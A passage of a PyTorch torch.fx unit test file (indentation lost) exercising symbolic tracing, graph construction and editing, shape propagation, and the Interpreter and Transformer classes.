loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
